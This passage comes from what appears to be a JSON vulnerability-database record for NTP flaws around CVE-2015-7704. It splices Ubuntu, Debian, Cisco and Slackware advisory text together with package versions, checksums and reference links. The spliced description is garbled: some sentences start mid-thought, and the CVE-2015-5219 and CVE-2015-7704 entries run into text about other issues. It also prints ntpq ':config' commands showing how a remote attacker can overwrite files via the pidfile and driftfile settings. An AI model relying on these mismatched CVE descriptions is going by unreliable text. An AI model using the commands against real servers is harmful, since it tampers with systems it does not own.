file\npaths. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled restarting after hitting a panic threshold. \n(CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)\n\nIt was discovered that NTP incorrectly handled memory when processing\ncertain autokey messages. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled rate limiting. A remote attacker could possibly use\nthis issue to cause clients to stop updating their clock. (CVE-2015-7704,\nCVE-2015-7705)\n\nYves Younan discovered that NTP incorrectly handled logfile and keyfile\ndirectives. (CVE-2015-7850)\n\nYves Younan and Aleksander Nikolich discovered that NTP incorrectly handled\nascii conversion. (CVE-2015-7852)\n\nYves Younan discovered that NTP incorrectly handled reference clock memory. \nA malicious refclock could possibly use this issue to cause NTP to crash,\nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-7853)\n\nJohn D \"Doug\" Birdwell discovered that NTP incorrectly handled decoding\ncertain bogus values. (CVE-2015-7855)\n\nStephen Gray discovered that NTP incorrectly handled symmetric association\nauthentication. (CVE-2015-7871)\n\nIn the default installation, attackers would be isolated by the NTP\nAppArmor profile. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n  ntp                             1:4.2.6.p5+dfsg-3ubuntu8.1\n\nUbuntu 15.04:\n  ntp                             1:4.2.6.p5+dfsg-3ubuntu6.2\n\nUbuntu 14.04 LTS:\n  ntp                             1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\n\nUbuntu 12.04 LTS:\n  ntp                             1:4.2.6.p3+dfsg-1ubuntu3.6\n\nIn general, a standard system update will make all the necessary changes. \n\nOn October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server\u0027s advertised time. \n\nWorkarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details. \n\nCVE-2015-5194\n\n    It was found that ntpd could crash due to an uninitialized\n    variable when processing malformed logconfig configuration\n    commands. \n\nCVE-2015-5195\n\n    It was found that ntpd exits with a segmentation fault when a\n    statistics type that was not enabled during compilation (e.g. \n    timingstats) is referenced by the statistics or filegen\n    configuration command\n\nCVE-2015-5219\n\n    It was discovered that sntp program would hang in an infinite loop\n    when a crafted NTP packet was received, related to the conversion\n    of the precision value in the packet to double. If the threshold is exceeded\n    after that, ntpd will exit with a message to the system log. This\n    option can be used with the -q and -x options. \n\n    ntpd could actually step the clock multiple times by more than the\n    panic threshold if its clock discipline doesn\u0027t have enough time to\n    reach the sync state and stay there for at least one update. \n\n    This is contrary to what the documentation says. Normally, the\n    assumption is that an MITM attacker can step the clock more than the\n    panic threshold only once when ntpd starts and to make a larger\n    adjustment the attacker has to divide it into multiple smaller\n    steps, each taking 15 minutes, which is slow. \n\nCVE-2015-7701\n\n    A memory leak flaw was found in ntpd\u0027s CRYPTO_ASSOC. \n\nCVE-2015-7703\n\n    Miroslav Lichvar of Red Hat found that the :config command can be\n    used to set the pidfile and driftfile paths without any\n    restrictions. A remote attacker could use this flaw to overwrite a\n    file on the file system with a file containing the pid of the ntpd\n    process (immediately) or the current estimated drift of the system\n    clock (in hourly intervals). For example:\n\n    ntpq -c \u0027:config pidfile /tmp/ntp.pid\u0027\n    ntpq -c \u0027:config driftfile /tmp/ntp.drift\u0027\n\n    In Debian ntpd is configured to drop root privileges, which limits\n    the impact of this issue. \n\nCVE-2015-7704\n\n    If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet\n    from the server to reduce its polling rate, it doesn\u0027t check if the\n    originate timestamp in the reply matches the transmit timestamp from\n    its request. A\n    specially crafted configuration file could cause an endless loop\n    resulting in a denial of service. \n\nCVE-2015-7852\n\n    A potential off by one vulnerability exists in the cookedprint\n    functionality of ntpq. A specially crafted buffer could cause a\n    buffer overflow potentially resulting in null byte being written out\n    of bounds. \n\nCVE-2015-7871\n\n    An error handling logic error exists within ntpd that manifests due\n    to improper error condition handling associated with certain\n    crypto-NAK packets. An unauthenticated, off-path attacker can force\n    ntpd processes on targeted servers to peer with time sources of the\n    attacker\u0027s choosing by transmitting symmetric active crypto-NAK\n    packets to ntpd. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:4.2.6.p5+dfsg-2+deb7u6. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p4+dfsg-3. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p4+dfsg-3. \n\nWe recommend that you upgrade your ntp packages. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz:  Upgraded. \n  In addition to bug fixes and enhancements, this release fixes\n  several low and medium severity vulnerabilities. \n  For more information, see:\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n21dd14178fea17a88c9326c8672ecefd  ntp-4.2.8p4-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8647479b2007b92ff8598184f2275263  ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ne0f122e8e271dc84db06202c03cc0288  ntp-4.2.8p4-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ndb0aff04b72b3d8c96ca8c8e1ed36c05  ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n5914e43e886e5ff88fefd30083493e30  ntp-4.2.8p4-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n4335c3bf2ae24afc5ad734e8d80b3e94  ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n39b05698797b638b67130e0b170e0a4b  ntp-4.2.8p4-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndcf4a56ba1d013ee1c9d0e624e158709  ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1fd3a7beaf23303e2c211af377662614  ntp-4.2.8p4-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n438c3185aa8ec20d1c2b5e51786e4d41  ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n81bfb2fed450cb26a51b5e1cee0d33ed  n/ntp-4.2.8p4-i586-1.txz\n\nSlackware x86_64 -current package:\n8bae4ad633af40d4d54b7686e4b225f9  n/ntp-4.2.8p4-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      },
      {
        "db": "CERT/CC",
        "id": "VU#718152"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "BID",
        "id": "77280"
      },
      {
        "db": "BID",
        "id": "92012"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "db": "PACKETSTORM",
        "id": "134093"
      },
      {
        "db": "PACKETSTORM",
        "id": "137992"
      },
      {
        "db": "PACKETSTORM",
        "id": "138803"
      },
      {
        "db": "PACKETSTORM",
        "id": "134082"
      },
      {
        "db": "PACKETSTORM",
        "id": "136864"
      },
      {
        "db": "PACKETSTORM",
        "id": "134102"
      },
      {
        "db": "PACKETSTORM",
        "id": "134034"
      },
      {
        "db": "PACKETSTORM",
        "id": "134162"
      },
      {
        "db": "PACKETSTORM",
        "id": "134137"
      }
    ],
    "trust": 3.78
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-7704",
        "trust": 3.7
      },
      {
        "db": "CERT/CC",
        "id": "VU#718152",
        "trust": 3.6
      },
      {
        "db": "BID",
        "id": "77280",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1033951",
        "trust": 1.7
      },
      {
        "db": "MCAFEE",
        "id": "SB10284",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU91176422",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700",
        "trust": 0.8
      },
      {
        "db": "MCAFEE",
        "id": "SB10164",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585",
        "trust": 0.6
      },
      {
        "db": "JUNIPER",
        "id": "JSA10711",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-17-094-04",
        "trust": 0.3
      },
      {
        "db": "BID",
        "id": "92012",
        "trust": 0.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-15-356-01",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7704",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134093",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "137992",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138803",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134082",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136864",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134102",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134034",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134162",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134137",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#718152"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "db": "BID",
        "id": "77280"
      },
      {
        "db": "BID",
        "id": "92012"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "PACKETSTORM",
        "id": "134093"
      },
      {
        "db": "PACKETSTORM",
        "id": "137992"
      },
      {
        "db": "PACKETSTORM",
        "id": "138803"
      },
      {
        "db": "PACKETSTORM",
        "id": "134082"
      },
      {
        "db": "PACKETSTORM",
        "id": "136864"
      },
      {
        "db": "PACKETSTORM",
        "id": "134102"
      },
      {
        "db": "PACKETSTORM",
        "id": "134034"
      },
      {
        "db": "PACKETSTORM",
        "id": "134162"
      },
      {
        "db": "PACKETSTORM",
        "id": "134137"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "id": "VAR-201708-1547",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.33987721
  },
  "last_update_date": "2024-07-23T21:56:47.739000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HPSBHF03646",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05270839"
      },
      {
        "title": "Bug 2901",
        "trust": 0.8,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2901"
      },
      {
        "title": "Bug 1271070",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1271070"
      },
      {
        "title": "NTP Bug 2901",
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/main/ntpbug2901"
      },
      {
        "title": "October 2015 NTP-4.2.8p4 Security Vulnerability Announcement (Medium)",
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/main/securitynotice#october_2015_ntp_4_2_8p4_securit"
      },
      {
        "title": "NTP Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=119777"
      },
      {
        "title": "Red Hat: Important: ntp security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152520 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2015-7704",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-7704"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2015-607",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-607"
      },
      {
        "title": "Ubuntu Security Notice: ntp vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2783-1"
      },
      {
        "title": "Citrix Security Bulletins: Citrix XenServer Multiple Security Updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=089f3f781342f5003697826b78ce46a9"
      },
      {
        "title": "Debian Security Advisories: DSA-3388-1 ntp -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=61fe4252a877d02aaea1c931efa0a305"
      },
      {
        "title": "Symantec Security Advisories: SA103 : October 2015 NTP Security Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=f5e05389a60d3a56f2a0ad0ec21579d9"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20151021-ntp"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eb439566c9130adc92d21bc093204cf8"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "https://www.kb.cert.org/vuls/id/718152"
      },
      {
        "trust": 2.1,
        "url": "https://www.cs.bu.edu/~goldbe/ntpattack.html"
      },
      {
        "trust": 2.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-1930.html"
      },
      {
        "trust": 2.0,
        "url": "https://support.citrix.com/article/ctx220112"
      },
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/201607-15"
      },
      {
        "trust": 1.7,
        "url": "https://eprint.iacr.org/2015/1020.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1271070"
      },
      {
        "trust": 1.7,
        "url": "http://support.ntp.org/bin/view/main/securitynotice#october_2015_ntp_4_2_8p4_securit"
      },
      {
        "trust": 1.7,
        "url": "http://support.ntp.org/bin/view/main/ntpbug2901"
      },
      {
        "trust": 1.7,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2901"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05270839"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/77280"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1033951"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2015/dsa-3388"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20171004-0002/"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20171004-0001/"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2520.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html"
      },
      {
        "trust": 1.7,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10284"
      },
      {
        "trust": 1.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704"
      },
      {
        "trust": 1.6,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1212-security-advisory-0016"
      },
      {
        "trust": 1.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704"
      },
      {
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security"
      },
      {
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/main/securitynotice#january_2016_ntp_4_2_8p6_securit"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu91176422/"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855"
      },
      {
        "trust": 0.6,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 0.6,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10164"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850"
      },
      {
        "trust": 0.5,
        "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692"
      },
      {
        "trust": 0.4,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151021-ntp"
      },
      {
        "trust": 0.4,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05270839"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851"
      },
      {
        "trust": 0.3,
        "url": "https://github.com/ntp-project/ntp/blob/stable/news#l295"
      },
      {
        "trust": 0.3,
        "url": "http://www.ntp.org"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10711"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04"
      },
      {
        "trust": 0.3,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160428-ntpd"
      },
      {
        "trust": 0.3,
        "url": "http://learn.extremenetworks.com/rs/641-vmv-602/images/vn-2015-009_multiple_ntp_vulnerabilities.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/oct/113"
      },
      {
        "trust": 0.3,
        "url": "isg3t1023874"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023885"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024073"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023874"
      },
      {
        "trust": 0.3,
        "url": "http://support.ntp.org/bin/view/main/ntpbug2952"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21981747"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099260"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005821"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21979393"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980676"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983501"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983506"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021264"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/index.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5300"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7702"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7851"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7701"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7855"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7852"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7850"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7854"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7849"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7853"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7871"
      },
      {
        "trust": 0.2,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7848"
      },
      {
        "trust": 0.2,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.2,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.2,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5219"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5194"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5146"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5195"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5196"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
